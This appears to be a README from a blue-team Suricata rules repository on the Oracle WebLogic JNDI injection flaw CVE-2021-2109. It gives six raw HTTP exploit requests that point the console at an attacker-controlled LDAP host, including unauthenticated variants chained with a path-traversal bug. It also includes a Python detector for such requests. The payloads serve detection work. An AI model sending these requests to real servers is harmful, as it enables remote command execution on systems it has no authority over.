## Overview
CVE-2021-2109 is a JNDI injection vulnerability in Oracle WebLogic Server. It allows highly privileged users, such as the "weblogic" administrator account, to execute arbitrary commands on the underlying system.
Furthermore, if the server is also vulnerable to CVE-2020-14750, attackers can chain the two and exploit CVE-2021-2109 without authenticating.
If you cannot determine whether your Oracle WebLogic Servers expose the administration interface only on the default port 7001/TCP, use **any any -> any any** in the Suricata rule instead of **any any -> any 7001** so that the rule matches the console on any port.
## Proof of Concept
* GET method
```
GET /console/consolejndi.portal?_pageLabel%3DJNDIBindingPageGeneral%26_nfpb%3Dtrue%26JNDIBindingPortlethandle%3Dcom.bea.console.handles.JndiBindingHandle%28%22ldap%3A//10.10.10%3B10%3A443/exploit%3BAdminServer%22%29 HTTP/1.1
Host: example.com:7001
Cookie: ADMINCONSOLESESSION=Igk9iHRPgEo-A62PKQ3AFNK_-_erbLTMHvRAvOtmNkLYtwl3u4UD!-1638211874
Content-Length: 0
```
* POST method with the payload on the URI
```
POST /console/consolejndi.portal?_pageLabel%3DJNDIBindingPageGeneral%26_nfpb%3Dtrue%26JNDIBindingPortlethandle%3Dcom.bea.console.handles.JndiBindingHandle%28%22ldap%3A//10.10.10%3B10%3A443/exploit%3BAdminServer%22%29 HTTP/1.1
Host: example.com:7001
Cookie: ADMINCONSOLESESSION=Igk9iHRPgEo-A62PKQ3AFNK_-_erbLTMHvRAvOtmNkLYtwl3u4UD!-1638211874
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
```
* POST method with the payload in the body
```
POST /console/consolejndi.portal HTTP/1.1
Host: example.com:7001
Cookie: ADMINCONSOLESESSION=Igk9iHRPgEo-A62PKQ3AFNK_-_erbLTMHvRAvOtmNkLYtwl3u4UD!-1638211874
Content-Type: application/x-www-form-urlencoded
Content-Length: 157

_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle("ldap://10.10.10;10:443/exploit;AdminServer")
```
* GET method (chains with CVE-2020-14750)
```
GET /console/css/%%32e.%%32fconsolejndi.portal?_pageLabel%3DJNDIBindingPageGeneral%26_nfpb%3Dtrue%26JNDIBindingPortlethandle%3Dcom.bea.console.handles.JndiBindingHandle%28%22ldap%3A//10.10.10%3B10%3A443/exploit%3BAdminServer%22%29 HTTP/1.1
Host: example.com:7001
Content-Length: 0
```
* POST method with the payload on the URI (chains with CVE-2020-14750)
```
POST /console/css/%%32e.%%32fconsolejndi.portal?_pageLabel%3DJNDIBindingPageGeneral%26_nfpb%3Dtrue%26JNDIBindingPortlethandle%3Dcom.bea.console.handles.JndiBindingHandle%28%22ldap%3A//10.10.10%3B10%3A443/exploit%3BAdminServer%22%29 HTTP/1.1
Host: example.com:7001
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
```
* POST method with the payload in the body (chains with CVE-2020-14750)
```
POST /console/css/%%32e.%%32fconsolejndi.portal HTTP/1.1
Host: example.com:7001
Content-Type: application/x-www-form-urlencoded
Content-Length: 157

_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle("ldap://10.10.10;10:443/exploit;AdminServer")
```
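As an added example (not part of the repository's rules or any Oracle code), the detection that the PoCs above and the port note in the Overview call for, written in Python rather than Suricata syntax so it can be run against a raw request: it percent-decodes the target repeatedly so the double-encoded `%%32e.%%32f` chain collapses onto `/console/consolejndi.portal`, then looks for a `JndiBindingHandle(` carrying a JNDI URL in either the query string or the form body. The sample requests are constructed here; matching `rmi://` and `iiop://` alongside `ldap://` is an assumption beyond what the page shows.

```python
import re
from posixpath import normpath
from urllib.parse import unquote

CONSOLE_JNDI = "/console/consolejndi.portal"
# A JndiBindingHandle whose first component is a JNDI URL. The PoC uses ldap://;
# rmi:// and iiop:// are added here as an assumption, not something the page shows.
JNDI_HANDLE = re.compile(r'JndiBindingHandle\(\s*"(?:ldaps?|rmi|iiop)://', re.I)

def deep_unquote(s, rounds=3):
    """Percent-decode until stable (bounded): %%32e.%%32f -> %2e.%2f -> ../"""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s

def classify_request(raw):
    """Return (is_jndi_injection, uses_traversal) for one raw HTTP/1.1 request.

    uses_traversal is True when the request only reaches consolejndi.portal via a
    '..' segment in the path, i.e. the CVE-2020-14750 chain from the PoC list."""
    head, _, body = raw.partition("\r\n\r\n")
    try:
        _method, target, _version = head.split("\r\n", 1)[0].split(" ", 2)
    except ValueError:
        return False, False
    path, _, query = target.partition("?")
    decoded_path = deep_unquote(path)
    if normpath(decoded_path) != CONSOLE_JNDI:   # collapses /console/css/../
        return False, False
    uses_traversal = "/../" in decoded_path
    # The handle may sit in the query string (GET/POST) or in the form body (POST).
    params = deep_unquote(query) + "&" + deep_unquote(body.strip())
    return bool(JNDI_HANDLE.search(params)), uses_traversal

# Constructed samples shaped like the PoC requests above (not captured traffic).
HANDLE_Q = ("_pageLabel%3DJNDIBindingPageGeneral%26_nfpb%3Dtrue%26JNDIBindingPortlethandle%3D"
            "com.bea.console.handles.JndiBindingHandle%28%22ldap%3A//10.10.10%3B10%3A443/exploit%3BAdminServer%22%29")
SAMPLES = {
    "get_direct": f"GET {CONSOLE_JNDI}?{HANDLE_Q} HTTP/1.1\r\nHost: example.com:7001\r\n\r\n",
    "post_body_chained": ("POST /console/css/%%32e.%%32fconsolejndi.portal HTTP/1.1\r\nHost: example.com:7001\r\n"
                          "Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 157\r\n\r\n"
                          "_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle="
                          'com.bea.console.handles.JndiBindingHandle("ldap://10.10.10;10:443/exploit;AdminServer")'),
    "benign": f"GET {CONSOLE_JNDI}?_nfpb=true&_pageLabel=JNDIBindingPageGeneral HTTP/1.1\r\nHost: example.com:7001\r\n\r\n",
}
```

Running `classify_request` over the three samples returns `(True, False)`, `(True, True)` and `(False, False)` respectively; the second value tells you whether the request also relied on the CVE-2020-14750 path traversal.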
## References
* https://www.oracle.com/security-alerts/cpujan2021.html
* https://www.exploit-db.com/exploits/49461
* https://twitter.com/pyn3rd/status/1351696768065409026
* https://twitter.com/jas502n/status/1352568441136242688
## suricata-rules: Suricata rules for newly disclosed critical vulnerabilities
What is Suricata? Suricata is a free, open-source, mature, fast and robust network threat detection engine. For more information, visit the Suricata website.

Purpose of this repository: to support blue-team members by writing Suricata rules for newly disclosed critical vulnerabilities, so that exploitation attempts are detected and blocked as early as possible, and to keep the Suricata rules updated regularly in a well-maintained repository.

Content structure: each vulnerability has its own folder. Each folder has two main parts: the README.md file, which contains three sections (an overview of the vulnerability; a proof of concept (PoC), in other words samples of the malicious payload; and references), and the .rules file, which holds the Suricata rules themselves.

Notes: many services run over HTTPS, but Suricata cannot inspect encrypted data. If you want Suricata to detect attackers in HTTPS payloads, set up a reverse proxy such as nginx to terminate HTTPS, forward plain HTTP to the application server, and run Suricata on that HTTP traffic. If you are not sure